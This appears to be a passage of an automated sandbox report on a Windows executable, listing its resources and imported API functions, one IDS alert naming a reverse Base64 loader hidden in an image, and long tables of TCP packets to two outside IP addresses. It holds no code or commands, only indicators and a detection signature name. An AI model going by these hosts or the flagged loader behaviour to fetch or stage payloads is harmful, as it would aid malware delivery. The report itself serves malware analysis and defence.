RT_RCDATA | 0x2b170 | 0x1d | ASCII text, with no line terminators | English | United States | 1.2758620689655173
RT_RCDATA | 0x2b190 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b194 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x2b198 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x2b1a0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x2b1a8 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x2b264 | 0x408 | data | English | United States | 0.42151162790697677
RT_MANIFEST | 0x2b66c | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T15:36:24.556728+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 185.199.109.133 | 443 | 192.168.2.7 | 49701 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 15:36:13.065045118 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:13.065129042 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:13.065462112 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:13.072426081 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:13.072459936 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:14.537013054 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:14.538163900 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:14.541297913 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:14.541305065 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:14.541790009 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:14.552397966 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:14.595375061 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:15.226366997 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:15.226389885 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:15.226449013 CET | 443 | 49700 | 185.166.143.50 | 192.168.2.7
Dec 16, 2024 15:36:15.226602077 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:15.226602077 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:15.226602077 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:15.234255075 CET | 49700 | 443 | 192.168.2.7 | 185.166.143.50
Dec 16, 2024 15:36:15.412333012 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:15.412394047 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:15.412467003 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:15.413225889 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:15.413247108 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:16.651689053 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:16.651835918 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:16.654642105 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:16.654675007 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:16.654966116 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:16.657066107 CET | 49701 | 443 | 192.168.2.7 | 185.199.109.133
Dec 16, 2024 15:36:16.703341961 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:17.147481918 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
Dec 16, 2024 15:36:17.147804976 CET | 443 | 49701 | 185.199.109.133 | 192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147835016 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147893906 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.147931099 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147979975 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.149214029 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.157883883 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.157973051 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.158023119 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.166038990 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.166121960 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.166141987 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.174472094 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.174551964 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.174568892 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.225207090 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.267631054 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.318933010 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.318999052 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345529079 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345612049 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345633984 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.345648050 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345695019 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.352744102 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.361246109 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.361350060 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.361371040 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.367723942 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.367796898 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.367814064 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.375070095 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.375147104 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.375163078 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.382318020 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.382383108 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.382400036 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428266048 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.428625107 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428638935 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428677082 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428690910 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428715944 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.428715944 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428730011 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.428785086 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.428812981 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.551661968 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.551676035 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.551714897 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.551745892 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.551861048 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.551933050 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.552068949 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.578746080 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.578758955 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.578795910 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.578874111 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.578891039 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.578907013 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.578942060 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.605314970 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.605335951 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.605428934 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.605456114 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.605520010 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.674818039 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.674839020 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.674902916 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.674938917 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.674974918 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.674997091 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.741363049 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.741388083 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.741481066 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.741533995 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.741583109 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.760776997 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.760801077 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.760890007 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.760899067 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.760936022 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.760957956 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.780370951 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.780389071 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.780491114 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.780563116 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.780630112 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.794960976 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.794981956 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.795075893 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.795094013 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.795145988 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.811142921 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.811170101 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.811216116 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.811232090 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.811260939 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.811278105 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.823685884 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.823710918 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.823782921 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.823815107 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.823832035 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.823863029 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.925407887 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.925436020 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.925571918 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.925618887 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.925676107 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.934165001 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.934185982 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.934273005 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.934283018 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.934329987 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.943985939 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.944006920 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.944072008 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.944081068 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.944122076 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.944139957 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.952874899 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.952893019 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.953027010 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.953037024 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.953083038 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.963951111 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.963968039 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.964065075 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.964072943 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.964116096 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.971590996 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.971607924 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.971683025 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.971693993 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.971740961 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.978384018 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.009206057 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.009232998 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.009299994 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.009315968 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.009335041 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.009358883 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.017141104 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.017158031 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.017241955 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.017314911 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.017359018 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.017359018 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.119401932 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.119427919 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.119503021 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.119585991 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.119627953 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.119652987 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.127289057 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.127322912 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.127367020 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.127383947 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.127413034 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.127434015 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:18.134742022 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.134761095 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:18.134828091 CET49701443192.168.2.7185.199.109.133
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 16, 2024 15:36:18.134839058 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.134895086 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.143892050 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.143953085 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.143995047 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.144047022 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.144083023 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.144103050 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.151416063 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.151464939 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.151501894 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.151508093 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.151539087 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.151557922 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.160037041 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.160084009 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.160116911 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.160125017 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.160144091 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.160161972 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.201339006 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.201385975 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.201433897 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.201447964 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.201474905 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.201494932 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.209901094 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.209942102 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.210110903 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.210112095 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.210181952 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.210241079 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.311758995 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.311832905 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.311892033 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.311966896 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.312009096 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.312031984 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.318841934 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.318887949 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.318928957 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.318943024 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.318970919 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.318990946 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.326363087 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.326410055 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.326472044 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.326492071 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.326519966 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.326544046 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.334534883 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.334582090 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.334655046 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.334675074 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.334698915 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.334719896 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.342113018 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.342159033 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.342183113 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.342190027 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.342217922 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.342230082 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.350301027 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.350363016 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.350395918 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.350400925 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.350434065 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.350451946 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.393754959 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.393807888 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.393848896 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.393922091 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.393965006 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.393989086 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.496395111 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.496427059 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.496484995 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.496503115 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.496536970 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.496710062 CET  49701        443        192.168.2.7      185.199.109.133
Dec 16, 2024 15:36:18.502810001 CET  443          49701      185.199.109.133  192.168.2.7
Dec 16, 2024 15:36:18.502835989 CET  443          49701      185.199.109.133  192.168.2.7
